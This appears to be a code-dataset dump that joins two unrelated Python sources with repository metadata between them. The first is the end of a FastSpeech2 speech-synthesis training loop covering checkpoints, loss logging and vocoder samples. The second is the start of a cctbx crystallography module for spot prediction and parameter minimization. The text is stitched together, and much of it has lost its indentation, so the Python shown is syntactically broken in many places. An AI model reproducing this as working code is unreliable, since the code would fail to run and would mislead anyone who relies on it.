num_param = utils.get_param_num(model)
print('Number of FastSpeech2 Parameters:', num_param)
# Optimizer and loss
optimizer = torch.optim.Adam(model.parameters(), betas=hp.betas, eps=hp.eps, weight_decay = hp.weight_decay)
scheduled_optim = ScheduledOptim(optimizer, hp.decoder_hidden, hp.n_warm_up_step, args.restore_step)
Loss = FastSpeech2Loss().to(device)
print("Optimizer and Loss Function Defined.")
# Load checkpoint if exists
checkpoint_path = os.path.join(hp.checkpoint_path)
try:
checkpoint = torch.load(os.path.join(
checkpoint_path, 'checkpoint_{}.pth.tar'.format(args.restore_step)))
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("\n---Model Restored at Step {}---\n".format(args.restore_step))
    except Exception:  # checkpoint missing or incompatible; start from scratch
print("\n---Start New Training---\n")
if not os.path.exists(checkpoint_path):
os.makedirs(checkpoint_path)
# Load vocoder
if hp.vocoder == 'melgan':
melgan = utils.get_melgan()
elif hp.vocoder == 'waveglow':
waveglow = utils.get_waveglow()
# Init logger
log_path = hp.log_path
if not os.path.exists(log_path):
os.makedirs(log_path)
os.makedirs(os.path.join(log_path, 'train'))
os.makedirs(os.path.join(log_path, 'validation'))
train_logger = SummaryWriter(os.path.join(log_path, 'train'))
val_logger = SummaryWriter(os.path.join(log_path, 'validation'))
# Init synthesis directory
synth_path = hp.synth_path
if not os.path.exists(synth_path):
os.makedirs(synth_path)
# Define Some Information
Time = np.array([])
Start = time.perf_counter()
# Training
model = model.train()
for epoch in range(hp.epochs):
        # Total number of training steps across all epochs
        total_step = hp.epochs * len(loader) * hp.batch_size
for i, batchs in enumerate(loader):
for j, data_of_batch in enumerate(batchs):
start_time = time.perf_counter()
current_step = i*hp.batch_size + j + args.restore_step + epoch*len(loader)*hp.batch_size + 1
# Get Data
text = torch.from_numpy(data_of_batch["text"]).long().to(device)
mel_target = torch.from_numpy(data_of_batch["mel_target"]).float().to(device)
D = torch.from_numpy(data_of_batch["D"]).long().to(device)
log_D = torch.from_numpy(data_of_batch["log_D"]).float().to(device)
f0 = torch.from_numpy(data_of_batch["f0"]).float().to(device)
energy = torch.from_numpy(data_of_batch["energy"]).float().to(device)
src_len = torch.from_numpy(data_of_batch["src_len"]).long().to(device)
mel_len = torch.from_numpy(data_of_batch["mel_len"]).long().to(device)
max_src_len = np.max(data_of_batch["src_len"]).astype(np.int32)
max_mel_len = np.max(data_of_batch["mel_len"]).astype(np.int32)
# Forward
mel_output, mel_postnet_output, log_duration_output, f0_output, energy_output, src_mask, mel_mask, _ = model(
text, src_len, mel_len, D, f0, energy, max_src_len, max_mel_len)
# Cal Loss
mel_loss, mel_postnet_loss, d_loss, f_loss, e_loss = Loss(
log_duration_output, log_D, f0_output, f0, energy_output, energy, mel_output, mel_postnet_output, mel_target, ~src_mask, ~mel_mask)
total_loss = mel_loss + mel_postnet_loss + d_loss + f_loss + e_loss
# Logger
t_l = total_loss.item()
m_l = mel_loss.item()
m_p_l = mel_postnet_loss.item()
d_l = d_loss.item()
f_l = f_loss.item()
e_l = e_loss.item()
with open(os.path.join(log_path, "total_loss.txt"), "a") as f_total_loss:
f_total_loss.write(str(t_l)+"\n")
with open(os.path.join(log_path, "mel_loss.txt"), "a") as f_mel_loss:
f_mel_loss.write(str(m_l)+"\n")
with open(os.path.join(log_path, "mel_postnet_loss.txt"), "a") as f_mel_postnet_loss:
f_mel_postnet_loss.write(str(m_p_l)+"\n")
with open(os.path.join(log_path, "duration_loss.txt"), "a") as f_d_loss:
f_d_loss.write(str(d_l)+"\n")
with open(os.path.join(log_path, "f0_loss.txt"), "a") as f_f_loss:
f_f_loss.write(str(f_l)+"\n")
with open(os.path.join(log_path, "energy_loss.txt"), "a") as f_e_loss:
f_e_loss.write(str(e_l)+"\n")
# Backward
total_loss = total_loss / hp.acc_steps
total_loss.backward()
if current_step % hp.acc_steps != 0:
continue
# Clipping gradients to avoid gradient explosion
nn.utils.clip_grad_norm_(model.parameters(), hp.grad_clip_thresh)
# Update weights
scheduled_optim.step_and_update_lr()
scheduled_optim.zero_grad()
# Print
if current_step % hp.log_step == 0:
Now = time.perf_counter()
str1 = "Epoch [{}/{}], Step [{}/{}]:".format(
epoch+1, hp.epochs, current_step, total_step)
str2 = "Total Loss: {:.4f}, Mel Loss: {:.4f}, Mel PostNet Loss: {:.4f}, Duration Loss: {:.4f}, F0 Loss: {:.4f}, Energy Loss: {:.4f};".format(
t_l, m_l, m_p_l, d_l, f_l, e_l)
str3 = "Time Used: {:.3f}s, Estimated Time Remaining: {:.3f}s.".format(
(Now-Start), (total_step-current_step)*np.mean(Time))
print("\n" + str1)
print(str2)
print(str3)
with open(os.path.join(log_path, "log.txt"), "a") as f_log:
f_log.write(str1 + "\n")
f_log.write(str2 + "\n")
f_log.write(str3 + "\n")
f_log.write("\n")
train_logger.add_scalar('Loss/total_loss', t_l, current_step)
train_logger.add_scalar('Loss/mel_loss', m_l, current_step)
train_logger.add_scalar('Loss/mel_postnet_loss', m_p_l, current_step)
train_logger.add_scalar('Loss/duration_loss', d_l, current_step)
train_logger.add_scalar('Loss/F0_loss', f_l, current_step)
train_logger.add_scalar('Loss/energy_loss', e_l, current_step)
if current_step % hp.save_step == 0:
torch.save({'model': model.state_dict(), 'optimizer': optimizer.state_dict(
)}, os.path.join(checkpoint_path, 'checkpoint_{}.pth.tar'.format(current_step)))
print("save model at step {} ...".format(current_step))
if current_step % hp.synth_step == 0:
length = mel_len[0].item()
mel_target_torch = mel_target[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel_target = mel_target[0, :length].detach().cpu().transpose(0, 1)
mel_torch = mel_output[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel = mel_output[0, :length].detach().cpu().transpose(0, 1)
mel_postnet_torch = mel_postnet_output[0, :length].detach().unsqueeze(0).transpose(1, 2)
mel_postnet = mel_postnet_output[0, :length].detach().cpu().transpose(0, 1)
Audio.tools.inv_mel_spec(mel, os.path.join(synth_path, "step_{}_griffin_lim.wav".format(current_step)))
Audio.tools.inv_mel_spec(mel_postnet, os.path.join(synth_path, "step_{}_postnet_griffin_lim.wav".format(current_step)))
if hp.vocoder == 'melgan':
utils.melgan_infer(mel_torch, melgan, os.path.join(hp.synth_path, 'step_{}_{}.wav'.format(current_step, hp.vocoder)))
utils.melgan_infer(mel_postnet_torch, melgan, os.path.join(hp.synth_path, 'step_{}_postnet_{}.wav'.format(current_step, hp.vocoder)))
utils.melgan_infer(mel_target_torch, melgan, os.path.join(hp.synth_path, 'step_{}_ground-truth_{}.wav'.format(current_step, hp.vocoder)))
elif hp.vocoder == 'waveglow':
utils.waveglow_infer(mel_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_{}.wav'.format(current_step, hp.vocoder)))
utils.waveglow_infer(mel_postnet_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_postnet_{}.wav'.format(current_step, hp.vocoder)))
utils.waveglow_infer(mel_target_torch, waveglow, os.path.join(hp.synth_path, 'step_{}_ground-truth_{}.wav'.format(current_step, hp.vocoder)))
f0 = f0[0, :length].detach().cpu().numpy()
energy = energy[0, :length].detach().cpu().numpy()
f0_output = f0_output[0, :length].detach().cpu().numpy()
energy_output = energy_output[0, :length].detach().cpu().numpy()
utils.plot_data([(mel_postnet.numpy(), f0_output, energy_output), (mel_target.numpy(), f0, energy)],
                        ['Synthesized Spectrogram', 'Ground-Truth Spectrogram'], filename=os.path.join(synth_path, 'step_{}.png'.format(current_step)))
if current_step % hp.eval_step == 0:
model.eval()
with torch.no_grad():
d_l, f_l, e_l, m_l, m_p_l = evaluate(model, current_step)
t_l = d_l + f_l + e_l + m_l + m_p_l
val_logger.add_scalar('Loss/total_loss', t_l, current_step)
val_logger.add_scalar('Loss/mel_loss', m_l, current_step)
val_logger.add_scalar('Loss/mel_postnet_loss', m_p_l, current_step)
val_logger.add_scalar('Loss/duration_loss', d_l, current_step)
val_logger.add_scalar('Loss/F0_loss', f_l, current_step)
val_logger.add_scalar('Loss/energy_loss', e_l, current_step)
model.train()
end_time = time.perf_counter()
Time = np.append(Time, end_time - start_time)
if len(Time) == hp.clear_Time:
temp_value = np.mean(Time)
Time = np.delete(
Time, [i for i in range(len(Time))], axis=None)
Time = np.append(Time, temp_value)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--restore_step', type=int, default=0)
args = parser.parse_args()
main(args)
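# Standalone sketch (illustrative, not part of the original training script) of the
# gradient-accumulation pattern used above with hp.acc_steps: the loss is divided by
# the accumulation factor, backward() accumulates gradients, and the optimizer steps
# once every acc_steps micro-batches. Model and data below are toy assumptions.
def _grad_accumulation_demo(acc_steps=4, total_steps=8):
    model = nn.Linear(10, 1)
    optimizer = torch.optim.Adam(model.parameters())
    for step in range(1, total_steps + 1):
        x, y = torch.randn(2, 10), torch.randn(2, 1)
        loss = nn.functional.mse_loss(model(x), y) / acc_steps  # scale so summed grads average
        loss.backward()  # gradients accumulate across micro-batches
        if step % acc_steps == 0:
            optimizer.step()       # single weight update per acc_steps micro-batches
            optimizer.zero_grad()  # clear accumulated gradients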
avg_line_length: 51.349794 | max_line_length: 166 | alphanum_fraction: 0.563552
hexsha: ff61aae3f4c0fd99f2bc79b8f89f7abc6e439d72 | size: 52,588 | ext: py | lang: Python
max_stars:  rstbx/apps/slip_helpers.py | dperl-sol/cctbx_project @ b9e390221a2bc4fd00b9122e97c3b79c632c6664 | ["BSD-3-Clause-LBNL"] | count: 155 | events: 2016-11-23T12:52:16.000Z .. 2022-03-31T15:35:44.000Z
max_issues: rstbx/apps/slip_helpers.py | dperl-sol/cctbx_project @ b9e390221a2bc4fd00b9122e97c3b79c632c6664 | ["BSD-3-Clause-LBNL"] | count: 590 | events: 2016-12-10T11:31:18.000Z .. 2022-03-30T23:10:09.000Z
max_forks:  rstbx/apps/slip_helpers.py | dperl-sol/cctbx_project @ b9e390221a2bc4fd00b9122e97c3b79c632c6664 | ["BSD-3-Clause-LBNL"] | count: 115 | events: 2016-11-15T08:17:28.000Z .. 2022-02-09T15:30:14.000Z
from __future__ import absolute_import, division, print_function
from six.moves import range
import math
from libtbx.test_utils import approx_equal
from scitbx.array_family import flex
from scitbx import lbfgs
class minimizer(object):
def __init__(self,data,stuff,frame,max_iterations=50):
self.n = len(data)
self.values = data
self.initial = data.deep_copy()
    # parameters: mosaicity, high-energy wavelength, low-energy wavelength
    # constrain mosaicity between 0.1x and 10x of the input value
    self.lower_bound = flex.double([0.1*data[0],0.98*data[1],(data[1]+data[2])/2.])
    upper_bound = flex.double([10.*data[0],(data[1]+data[2])/2.,1.02*data[2]])
mean_value = (upper_bound - self.lower_bound)/2.
self.full_range = upper_bound - self.lower_bound
starting_params = flex.tan(math.pi*(((data - self.lower_bound)/self.full_range)-0.5))
self.x = starting_params.deep_copy()
print("staerting params",list(self.x))
self.stuff = stuff
self.frame = frame
# optimize parameters
self.minimizer = lbfgs.run(target_evaluator=self,
termination_params = lbfgs.termination_parameters(max_calls=20))
def compute_functional_and_gradients(self):
print("trying",list(self.x))
# try to constrain rather than restrain. Use arctan function to get this right
# minimizer can choose any value from -inf to inf but we'll keep values carefully in range
# mos
#if self.x[0]/self.initial[0] >2.: self.x[0]=2.*self.initial[0]
#assert self.x[1]<self.x[2]
#if self.x[1]/self.initial[1] <0.99: self.x[1]=0.99*self.initial[1]
#if self.x[2]/self.initial[2] >1.01: self.x[2]=1.01*self.initial[2]
#print "adjust",list(self.x)
def get_score(x):
unpacked = self.lower_bound + self.full_range*(
0.5 + (flex.atan(x)/math.pi)
)
#print " trying",list(unpacked)
return self.stuff.use_case_3_score_only(
self.frame,unpacked[0],unpacked[1],unpacked[2])
#f = self.stuff.use_case_3_score_only(
# self.frame,self.values[0],self.values[1],self.values[2])
f = get_score(self.x)
gradients = flex.double(len(self.x))
for i in range(self.n):
#factors = [1.000]*self.n
# factors[i] *= 1.001
# D_i = 0.001 * self.x[i]
#f_i_plus_D_i = self.stuff.use_case_3_score_only(
# self.frame,self.x[0]*factors[0],self.x[1]*factors[1],self.x[2]*factors[2])
trial_x = self.x.deep_copy()
trial_x[i]+=1.
f_i_plus_D_i = get_score(trial_x)
df_di = (f_i_plus_D_i - f)/1.
gradients[i]=df_di
return f,gradients
def unpacked(self,x):
return self.lower_bound + self.full_range*(
0.5 + (flex.atan(x)/math.pi)
)
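# A self-contained sketch (illustrative, not part of the original module) of the tan/atan
# box-constraint trick used by the minimizer class above: LBFGS explores unbounded x while
# the unpacked physical values stay strictly inside (lower, upper). Bounds are assumptions.
def _box_constraint_demo(lower=0.1, upper=1.0, value=0.55):
  full_range = upper - lower
  packed = math.tan(math.pi*(((value - lower)/full_range) - 0.5))    # bounded -> unbounded
  unpacked = lower + full_range*(0.5 + (math.atan(packed)/math.pi))  # unbounded -> bounded
  assert approx_equal(unpacked, value)  # round trip recovers the input value
  return packed, unpacked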
class wrapper_of_use_case_bp3(object):
def __init__(self, raw_image, spotfinder, imageindex, inputai, spot_prediction_limiting_resolution,
phil_params, sub=None):
"""MODEL: polychromatic beam with top hat bandpass profile.
isotropic mosaicity with top hat half-width; spots are brought into reflecting condition
by a finite rotation about the axis that is longitudinal to the projection of the q-vector
onto the detector plane.
"""
from rstbx.bandpass import use_case_bp3,parameters_bp3
from scitbx.matrix import col
from math import pi
from cctbx.crystal import symmetry
self.detector_origin = col((-inputai.getBase().xbeam, -inputai.getBase().ybeam, 0.))
crystal = symmetry(unit_cell=inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = spot_prediction_limiting_resolution)
parameters = parameters_bp3(
indices=indices.indices(), orientation=inputai.getOrientation(),
incident_beam=col((0.,0.,-1.)),
packed_tophat=col((1.,1.,0.)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((raw_image.pixel_size,raw_image.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=inputai.getBase().distance,
detector_origin=self.detector_origin
)
if phil_params.integration.subpixel_joint_model.translations is not None:
T = phil_params.integration.subpixel_joint_model.translations
import copy
resortedT = copy.copy(T)
for tt in range(0,len(T),2):
resortedT[tt] = T[tt+1]
resortedT[tt+1] = T[tt]
from rstbx.apps.dual_resolution_helpers import get_model_ref_limits
model_refinement_limiting_resolution = get_model_ref_limits(self,raw_image,spotfinder,
imageindex,inputai,spot_prediction_limiting_resolution)
print("resolution limits: model refinement %7.2f spot prediction %7.2f"%(
model_refinement_limiting_resolution,spot_prediction_limiting_resolution))
self.ucbp3 = use_case_bp3(parameters=parameters)
the_tiles = raw_image.get_tile_manager(phil_params).effective_tiling_as_flex_int(
reapply_peripheral_margin=True,encode_inactive_as_zeroes=True)
self.ucbp3.set_active_areas( the_tiles )
if phil_params.integration.signal_penetration==0.0:
self.ucbp3.set_sensor_model( thickness_mm = 0.0, mu_rho = 8.36644, signal_penetration = 0.0 )
else: self.ucbp3.set_sensor_model( thickness_mm = 0.5, mu_rho = 8.36644, # CS_PAD detector at 1.3 Angstrom
signal_penetration = phil_params.integration.signal_penetration)
# XXX still very buggy; how do penetration & thickness relate?
    if sub is not None and phil_params.integration.subpixel_joint_model.translations is not None:
      raise Exception("Cannot use both subpixel mechanisms simultaneously")
    elif sub is not None:
print("Subpixel corrections: using translation-pixel mechanism")
null_rotations_deg = flex.double(len(sub)//2)
self.ucbp3.set_subpixel(flex.double(sub),rotations_deg=null_rotations_deg)
elif phil_params.integration.subpixel_joint_model.translations is not None:
print("Subpixel corrections: using joint-refined translation + rotation")
self.ucbp3.set_subpixel(
resortedT, rotations_deg = flex.double(
phil_params.integration.subpixel_joint_model.rotations)
)
else:
print("Subpixel corrections: none used")
# Reduce Miller indices to a manageable set. NOT VALID if the crystal rotates significantly
self.ucbp3.prescreen_indices(inputai.wavelength)
# done with Miller set reduction
from annlib_ext import AnnAdaptorSelfInclude as AnnAdaptor
body_pixel_reference = flex.double()
limited_body_pixel_reference = flex.double()
for spot in spotfinder.images[imageindex]["goodspots"]:
for pxl in spot.bodypixels:
body_pixel_reference.append(pxl.y + 0.5)
body_pixel_reference.append(pxl.x + 0.5)
pixel_center = col((pxl.x,pxl.y,0.0))*raw_image.pixel_size
offs = self.detector_origin+pixel_center
radius_mm = math.hypot(offs[0],offs[1])
pixel_two_theta_rad = math.atan(radius_mm/inputai.getBase().distance)
pixel_d_ang = ( inputai.wavelength / (2.*math.sin (pixel_two_theta_rad/2.)) )
if pixel_d_ang > model_refinement_limiting_resolution:
limited_body_pixel_reference.append(pxl.y + 0.5)
limited_body_pixel_reference.append(pxl.x + 0.5)
self.model_refinement_limiting_resolution = model_refinement_limiting_resolution
# model refinement resolution limits must be applied in two places: 1) the reference
# list of body pixels to the ann adaptor, and 2) the enclosed_pixels_and_margin_pixels() function call
if self.model_refinement_limiting_resolution > 0.:
self.ucbp3.set_adaptor(limited_body_pixel_reference)
else:
self.ucbp3.set_adaptor(body_pixel_reference)
def set_variables(self, orientation, wave_HI, wave_LO, half_mosaicity_deg, domain_size=0.):
half_mosaicity_rad = half_mosaicity_deg * math.pi/180.
self.ucbp3.set_mosaicity(half_mosaicity_rad)
self.ucbp3.set_bandpass(wave_HI,wave_LO)
self.ucbp3.set_orientation(orientation)
self.ucbp3.set_domain_size(domain_size)
def score_only(self):
self.ucbp3.picture_fast_slow()
# not sure why x and y origin shifts are swapped here, but this seemed to work
swapped_origin = (-self.detector_origin[1],-self.detector_origin[0],0.)
self.ucbp3.spot_rectangles(swapped_origin)
self.ucbp3.spot_rectregions(swapped_origin,1.0)
if self.model_refinement_limiting_resolution > 0.:
self.ucbp3.enclosed_pixels_and_margin_pixels(self.model_refinement_limiting_resolution)
else:
self.ucbp3.enclosed_pixels_and_margin_pixels()
return self.ucbp3.score_only_detail(weight=50.)
class slip_callbacks:
def slip_callback(self,frame):
#best_params=self.use_case_3_simulated_annealing()
#best_params = self.use_case_3_grid_refine(frame)
#self.inputai.setOrientation(best_params[3])
#self.use_case_3_refactor(frame,best_params[0],best_params[1], best_params[2])
#self.inputai.set_orientation_reciprocal_matrix( (0.001096321006219932, -0.0007452314870693856, 0.007577824826005684, 0.0009042576974140007, -0.010205656871417366, -0.0009746502046169632, 0.012357726864252296, 0.00701297199602489, -0.0005717102325987258))
#self.use_case_3_refactor(frame,0.0995603664049, 1.29155605957, 1.30470696644 )
#self.use_case_3_refactor(frame,0.0995603664049, 1.29155605957, 1.30470696644,domain_size=2000. )
normal = True
# BLUE: predictions
blue_data = []
for ix,pred in enumerate(self.predicted):
      if not self.BSmasks[ix]: continue  # empty mask dict; '.keys()==[]' never matches on Python 3
x,y = frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(pred[1]/self.pixel_size) +0.5,
(pred[0]/self.pixel_size) +0.5)
blue_data.append((x,y))
if normal: self.blue_layer = frame.pyslip.AddPointLayer(
blue_data, color="blue", name="<blue_layer>",
radius=2,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
yellow_data = []; cyan_data = []
for imsk in range(len(self.BSmasks)):
smask_keys = self.get_ISmask(imsk)
bmask = self.BSmasks[imsk]
if len(bmask.keys())==0: continue
# CYAN: integration mask
for ks in range(0,len(smask_keys),2):
cyan_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
smask_keys[ks+1] + 0.5,smask_keys[ks] + 0.5))
# YELLOW: background mask
for key in bmask.keys():
yellow_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
key[1] + 0.5 ,key[0] + 0.5))
if normal: self.cyan_layer = frame.pyslip.AddPointLayer(
cyan_data, color="cyan", name="<cyan_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
if normal: self.yellow_layer = frame.pyslip.AddPointLayer(
yellow_data, color="yellow", name="<yellow_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
red_data = []; green_data = []
for spot in self.spotfinder.images[self.frame_numbers[self.image_number]]["goodspots"]:
# RED: spotfinder spot pixels
for pxl in spot.bodypixels:
red_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
pxl.y + 0.5, pxl.x + 0.5))
# GREEN: spotfinder centers of mass
green_data.append(
frame.pyslip.tiles.picture_fast_slow_to_map_relative(
spot.ctr_mass_y() + 0.5, spot.ctr_mass_x() + 0.5))
self.red_layer = frame.pyslip.AddPointLayer(
red_data, color="red", name="<red_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
if normal: self.green_layer = frame.pyslip.AddPointLayer(
green_data, color="green", name="<green_layer>",
radius=1.5,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_1(self,frame):
# A rehash of the spot-prediction algorithm for pedagogical use.
# Use an "ewald proximity" filter as suggested by Ralf.
# aside from a few extra spots due to ewald proximity, this is exactly the
# same spot model developed initially for the Sept/Dec 2011 CXI runs.
orange_data = []
from scitbx.matrix import col,sqr
print("wavelength",self.inputai.wavelength)
print("orientation",self.inputai.getOrientation())
A = sqr(self.inputai.getOrientation().reciprocal_matrix())
print("base",self.inputai.getBase())
print("pixel size",self.pixel_size)
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
detector_fast = col((0.,1.,0.))
detector_slow = col((1.,0.,0.))
distance = self.inputai.getBase().distance
s0 = col((0.,0.,1/self.inputai.wavelength))
s0_length = s0.length()
detector_normal = col((0.,0.,-1.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
for H in indices.indices():
s = A * H
q = (s + s0)
#print q.length(), s0_length
if abs(q.length() - s0_length) > 0.001: continue
q_unit = q.normalize()
# check if diffracted ray parallel to detector face
q_dot_n = q_unit.dot(detector_normal)
if q_dot_n >= 0: continue
r = (q_unit * distance / q_dot_n) - detector_origin
x = r.dot(detector_fast)
y = r.dot(detector_slow)
print(x,y)
orange_data.append( frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(x/self.pixel_size) +0.5,
(y/self.pixel_size) +0.5))
self.orange_layer = frame.pyslip.AddPointLayer(
orange_data, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_2(self,frame):
# Extend the model. Assume monochromatic beam but finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
orange_data = []
from scitbx.matrix import col,sqr
from math import pi
print("Moasicity degrees, half",0.1)
mosaicity_rad = 0.1 * pi/180. #half-width top-hat mosaicity
A = sqr(self.inputai.getOrientation().reciprocal_matrix())
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
detector_fast = col((0.,1.,0.))
detector_slow = col((1.,0.,0.))
distance = self.inputai.getBase().distance
#s0: parallel to the direction of incident radiation
s0 = col((0.,0.,1/self.inputai.wavelength))
s0_length = s0.length()
s0_unit = s0.normalize()
detector_normal = col((0.,0.,-1.))
# Cn, the circular section through the Ewald sphere.
Cncenter = -s0
Cnradius_squared = s0.length_sq()
# Taking a page from mathworld.wolfram.com, calculate the distance d
# between the centers of Co and Cn,
d = s0_length
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
for H in indices.indices():
s = A * H
rotax = s.normalize().cross(s0_unit) #The axis that most directly brings the Bragg spot onto Ewald sphere
s_rad = s.length()
s_rad_sq = s.length_sq()
# take a page from ewald_sphere.cpp, determine intersection of two coplanar circles
# Co, the circle centered on reciprocal origin and containing the point s,
# Cn, the circle centered on -s0 (ewald sphere center) of radius (1/lambda) with normal rotax.
# Consider the intersection of two circles:
# Co, the circle of rotation of H.
# Cocenter = 0; so it falls out of the equations
# The chord of intersection between Co and Cn lies a
# distance x along the (Cocenter - Cncenter) vector
      chord_direction = (rotax.cross( - Cncenter)).normalize()
a = s.length_sq()/(2.*s0_length)
b = math.sqrt(s.length_sq() - (a*a)) # Calculate half-length of the chord of intersection
# Two intersection points
intersections_0p = -a * s0_unit+ b*chord_direction
intersections_1p = -a * s0_unit- b*chord_direction
iangle_0= math.acos (intersections_0p.dot(s) / (s_rad_sq))
iangle_1= math.acos (intersections_1p.dot(s) / (s_rad_sq))
assert approx_equal((intersections_0p+s0).length()-s0_length,0. )
if iangle_0 < mosaicity_rad:
intersection = intersections_0p
elif iangle_1 < mosaicity_rad:
intersection = intersections_1p
else: continue
q = (intersection + s0)
q_unit = q.normalize()
# check if diffracted ray parallel to detector face
q_dot_n = q_unit.dot(detector_normal)
if q_dot_n >= 0: continue
print("IANGLES",iangle_0 * 180./pi, iangle_1 * 180./pi)
r = (q_unit * distance / q_dot_n) - detector_origin
x = r.dot(detector_fast)
y = r.dot(detector_slow)
orange_data.append( frame.pyslip.tiles.picture_fast_slow_to_map_relative(
(x/self.pixel_size) +0.5,
(y/self.pixel_size) +0.5))
self.orange_layer = frame.pyslip.AddPointLayer(
orange_data, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
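  # Numerical sanity check (illustrative sketch, not part of the original module) for the
  # two-circle intersection above: with a = |s|^2/(2*|s0|) and b = sqrt(|s|^2 - a^2), the
  # point p = -a*s0_unit + b*chord_direction lies on both Co (radius |s|, centered at the
  # reciprocal origin) and Cn (radius |s0|, centered at -s0). Example vectors are assumptions.
  #   s = col((0.3, 0.2, 0.1)); s0 = col((0., 0., 1./1.3))
  #   rotax = s.normalize().cross(s0.normalize())
  #   chord_direction = (rotax.cross(s0)).normalize()   # = rotax x (-Cncenter), as above
  #   a = s.length_sq()/(2.*s0.length())
  #   b = math.sqrt(s.length_sq() - a*a)
  #   p = -a * s0.normalize() + b * chord_direction
  #   assert approx_equal(p.length() - s.length(), 0.)          # p lies on Co
  #   assert approx_equal((p + s0).length() - s0.length(), 0.)  # p lies on Cn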
def use_case_2cpp(self,frame):
from rstbx.bandpass import use_case_bp2_picture_fast_slow
# Extend the model. Assume monochromatic beam but finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
picture_fast_slow = use_case_bp2_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)), wavelength=self.inputai.wavelength,
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin,
half_mosaicity_rad=0.1 * pi/180.
)
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.orange_layer = frame.pyslip.AddPointLayer(
map_relative, color="orange", name="<orange_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
def use_case_3cpp(self,frame):
from rstbx.bandpass import use_case_bp3_picture_fast_slow
# Extend the model. Assume polychromatic beam with top hat profile. Assume finite radial mosaicity. Dispense
# with the "ewald proximity" mechanism; now spots are brought into reflecting condition
# by a finite rotation about the axis that is longitudinal to the projection of the q-vector
# onto the detector plane.
from scitbx.matrix import col
from math import pi
detector_origin = col((-self.inputai.getBase().xbeam, -self.inputai.getBase().ybeam, 0.))
from cctbx.crystal import symmetry
crystal = symmetry(unit_cell=self.inputai.getOrientation().unit_cell(),space_group = "P1")
indices = crystal.build_miller_set(anomalous_flag=True, d_min = self.limiting_resolution)
cpp_results = use_case_bp3_picture_fast_slow(
indices=indices.indices(), orientation=self.inputai.getOrientation(),
incident_beam=col((0.,0.,1.)),
#tophat=col((self.inputai.wavelength,self.inputai.wavelength+0.00001,0.1*pi/180.)),
tophat=col((self.inputai.wavelength*0.9975,self.inputai.wavelength*1.0025,0.1*pi/180.)),
detector_normal=col((0.,0.,-1.)), detector_fast=col((0.,1.,0.)),detector_slow=col((1.,0.,0.)),
pixel_size=col((self.pixel_size,self.pixel_size,0)),
pixel_offset=col((0.5,0.5,0.0)), distance=self.inputai.getBase().distance,
detector_origin=detector_origin
)
picture_fast_slow = cpp_results[0].select(cpp_results[2])
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.yellow_layer = frame.pyslip.AddPointLayer(
map_relative, color="yellow", name="<yellow_layer>",
radius=3.0,
renderer = frame.pyslip.LightweightDrawPointLayer,
show_levels=[-2, -1, 0, 1, 2, 3, 4, 5])
picture_fast_slow = cpp_results[1].select(cpp_results[2])
map_relative = frame.pyslip.tiles.vec_picture_fast_slow_to_map_relative(picture_fast_slow)
self.red_layer = frame.pyslip.AddPointLayer(
